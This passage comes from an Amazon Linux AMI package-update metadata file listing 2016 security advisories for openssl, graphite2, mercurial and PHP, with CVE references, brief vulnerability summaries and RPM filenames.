name="perf" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.8" release="20.46.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.8-20.46.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.8" release="20.46.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-tools-devel-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.8" release="20.46.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.8-20.46.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.8" release="20.46.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.8-20.46.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-695</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-695: important priority package update for openssl</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2109:
1330101:
CVE-2016-2109 openssl: ASN.1 BIO handling of large amounts of data
CVE-2016-2108:
CVE-2016-2107:
CVE-2016-2106:
CVE-2016-2105:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2105" title="" id="CVE-2016-2105" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2106" title="" id="CVE-2016-2106" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2107" title="" id="CVE-2016-2107" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2108" title="" id="CVE-2016-2108" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2109" title="" id="CVE-2016-2109" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl-perl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-14.91.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="14.91.amzn1" epoch="1" 
arch="i686"><filename>Packages/openssl-perl-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-14.91.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="14.91.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-14.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-696</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-696: important priority package update for graphite2</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1526:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1308590:
CVE-2016-1526 graphite2: Out-of-bounds read vulnerability in TfUtil:LocaLookup
CVE-2016-1523:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305813:
CVE-2016-1523 graphite2: Heap-based buffer overflow in context item handling functionality
CVE-2016-1522:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305810:
CVE-2016-1522 graphite2: Null pointer dereference and out-of-bounds access vulnerabilities
CVE-2016-1521:
A vulnerability has been discovered in Graphite2. An attacker able to trick an unsuspecting user into opening specially crafted font files in an application using Graphite2 could exploit these flaws to cause the application to crash or, potentially, execute arbitrary code with the privileges of the application.
1305805:
CVE-2016-1521 graphite2: Out-of-bound read vulnerability triggered by crafted fonts
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1521" title="" id="CVE-2016-1521" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1522" title="" id="CVE-2016-1522" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1523" title="" id="CVE-2016-1523" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1526" title="" id="CVE-2016-1526" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="graphite2-devel" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-devel-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-debuginfo-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2" version="1.3.6" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/graphite2-1.3.6-1.9.amzn1.x86_64.rpm</filename></package><package name="graphite2-debuginfo" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-debuginfo-1.3.6-1.9.amzn1.i686.rpm</filename></package><package name="graphite2" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-1.3.6-1.9.amzn1.i686.rpm</filename></package><package name="graphite2-devel" version="1.3.6" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/graphite2-devel-1.3.6-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-697</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-697: important priority package update for mercurial</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3630:
The binary delta decoder in Mercurial before 3.7.3 allows remote attackers to execute arbitrary code via a (1) clone, (2) push, or (3) pull command, related to (a) a list sizing rounding error and (b) short records.
1322264:
CVE-2016-3630 mercurial: remote code execution in binary delta decoding
CVE-2016-3069:
It was discovered that the Mercurial convert extension failed to sanitize special characters in Git repository names. A Git repository with a specially crafted name could cause Mercurial to execute arbitrary code when the Git repository was converted to a Mercurial repository.
1320155:
CVE-2016-3069 mercurial: convert extension command injection via git repository names
CVE-2016-3068:
It was discovered that Mercurial failed to properly check Git sub-repository URLs. A Mercurial repository that includes a Git sub-repository with a specially crafted URL could cause Mercurial to execute arbitrary code.
1319768:
CVE-2016-3068 mercurial: command injection via git subrepository urls
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3068" title="" id="CVE-2016-3068" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3069" title="" id="CVE-2016-3069" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3630" title="" id="CVE-2016-3630" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mercurial-debuginfo" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-debuginfo-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-common" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-common-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-python27" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python27-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial-el" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-el-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="mercurial-python26" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/mercurial-python26-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.5.2" release="1.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/emacs-mercurial-3.5.2-1.26.amzn1.x86_64.rpm</filename></package><package name="emacs-mercurial" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-python27" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python27-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-common" version="3.5.2" release="1.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/mercurial-common-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-python26" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-python26-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="mercurial-debuginfo" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/mercurial-debuginfo-3.5.2-1.26.amzn1.i686.rpm</filename></package><package name="emacs-mercurial-el" version="3.5.2" release="1.26.amzn1" epoch="0" arch="i686"><filename>Packages/emacs-mercurial-el-3.5.2-1.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-698</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-698: important priority package update for php56 php55</title><issued date="2016-05-03 10:30:00" /><updated date="2016-05-03 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-4073:
1323103:
CVE-2016-4073 php: Negative size parameter in memcpy
CVE-2016-4072:
1323106:
CVE-2016-4072 php: Invalid memory write in phar on filename containing \0 inside name
CVE-2016-4071:
1323108:
CVE-2016-4071 php: Format string vulnerability in php_snmp_error()
CVE-2016-4070:
1323114:
CVE-2016-4070 php: Integer overflow in php_raw_url_encode
CVE-2016-3074:
Integer signedness error in GD Graphics Library 2.1.1 (aka libgd or libgd2) allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via crafted compressed gd2 data, which triggers a heap-based buffer overflow.
1321893:
CVE-2016-3074 php: Signedness vulnerability causing heap overflow in libgd
CVE-2015-8865:
1323118:
CVE-2015-8865 file: Buffer over-write in finfo_open with malformed magic file
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8865" title="" id="CVE-2015-8865" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074" title="" id="CVE-2016-3074" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4070" title="" id="CVE-2016-4070" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4071" title="" id="CVE-2016-4071" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4072" title="" id="CVE-2016-4072" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4073" title="" id="CVE-2016-4073" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php55-devel" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-gd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gd-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mysqlnd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mysqlnd-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-intl" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-intl-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-imap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-imap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.35" release="1.114.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-pgsql-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-dba" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-dba-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mssql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-process" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-process-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-xml" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xml-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-fpm" 
version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-fpm-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-embedded" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-embedded-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mcrypt" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mcrypt-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-odbc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-odbc-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mbstring-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-cli-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-opcache" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-opcache-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.35" release="1.114.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php55-debuginfo-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.35-1.114.amzn1.x86_64.rpm</filename></package><package name="php55-mbstring" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-xml" 
version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-pgsql" 
version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.35" release="1.114.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.35-1.114.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.21" release="1.124.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-debuginfo-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.21" release="1.124.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-tidy-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-recode" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.21" release="1.124.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-snmp-5.6.21-1.124.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" 
